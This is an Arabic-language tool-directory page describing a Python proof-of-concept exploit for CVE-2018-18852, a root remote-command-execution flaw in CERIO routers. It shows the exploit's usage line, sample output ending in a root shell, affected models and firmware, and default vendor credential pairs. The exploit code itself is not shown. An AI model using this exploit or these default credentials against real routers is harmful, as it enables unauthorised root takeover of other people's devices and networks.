Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852، تنفيذ تعليمات عن بُعد (RCE) موثوق (بالإعدادات الافتراضية للمورد) عبر الويب كمستخدم جذر. | Kitploit
أدوات/GitHubGitHub/andripwn/cve-2018-18852
أمان الأنظمة المدمجةأمان إنترنت الأشياءهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأداة الوصول عن بعد
GitHubandripwn/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852، تنفيذ تعليمات عن بُعد (RCE) موثوق (بالإعدادات الافتراضية للمورد) عبر الويب كمستخدم جذر.

عرض المستودع
112منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تنفيذ أوامر عن بعد مصادق عليها في راوتر CERIO (بيانات اعتماد البائع الخلفية) CVE-2018-18852 PoC بلغة بايثون

hook-s3c (github.com/andripwn), @andripwn على تويتر

PoC بلغة بايثون عاملة لـ CVE-2018-18852، ظهرت أصلاً على؛ https://github.com/andripwn/CVE-2018-18852

ما الجديد

نماذج ومتغيرات راوتر CERIO، DT300N، DT100G، AMR-3204، WMR-200N معرضة لثغرة تنفيذ أوامر عن بعد مصادق عليها عبر الويب كمستخدم root.

موجودة كإعلان 0day غير مفصح عنه؛ https://www.fortiguard.com/zeroday/FG-VD-18-149

عادةً ما تكون بيانات اعتماد البائع الافتراضية موجودة، لذا فإن التنفيذ تافه.

البنية هي MIPS.

الاستخدام والمثال

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

مجموعات بيانات الاعتماد الافتراضية؛

  • operator:1234
  • admin:admin
  • root:default

تحيات

تحية إلى vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee اذهب واحصل على Introducing Neals لـ YTCracker، تدخل الحكومة ليس مزحة - استيقظوا بحق الجحيم

HTP!!!! YEET

تنزيل الأداة